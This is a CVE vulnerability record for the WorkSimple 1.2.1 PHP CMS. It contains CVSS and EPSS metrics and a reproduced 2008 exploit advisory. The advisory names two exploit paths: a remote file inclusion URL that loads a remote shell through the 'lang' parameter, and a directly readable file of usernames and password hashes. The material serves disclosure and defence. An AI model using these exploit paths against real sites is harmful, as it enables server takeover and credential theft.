Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 7481
Publication date : 2008-12-14 23h00 +00:00
Author : Osirys
EDB Verified : Yes
[START]
#########################################################################################
[0x01] Informations:
Script : WorkSimple 1.2.1
Download : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1
Vulnerability : Remote File Inclusion / Sensitive Data Disclosure
Author : Osirys
Contact : osirys[at]live[dot]it
Notes : Proud to be Italian
Greets: : XaDoS, x0r, emgent, Jay
#########################################################################################
[0x02] Bug:[Remote File Inclusion]
######
Bugged file is: /[path]/calendar.php
[CODE]
<?PHP require 'data/conf.php'; //Include the global config ?>
<?php include("$lang") ?>
[/CODE]
$lang variable is not declared, I thought it was declared on conf.php, but it's not.
So we can set the $lang value directly from GET.
FIX : Just declare $lang, for example in /[path]/data/conf.php
[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell]
########################################################################################
[0x03] Bug:[Sensitive Data Disclosure]
######
In this cms, when an user register himself, the cms puts informations like username and
password on a .txt file. So, just going on it, we can get sensitive data like username
and passoword. username:md5_hash
[!] EXPLOIT: /[path]/data/usr.txt
#########################################################################################
[/END]
# milw0rm.com [2008-12-15]
Products Mentioned
Configuraton 0
2500mhz>>Worksimple >> Version 1.2.1
References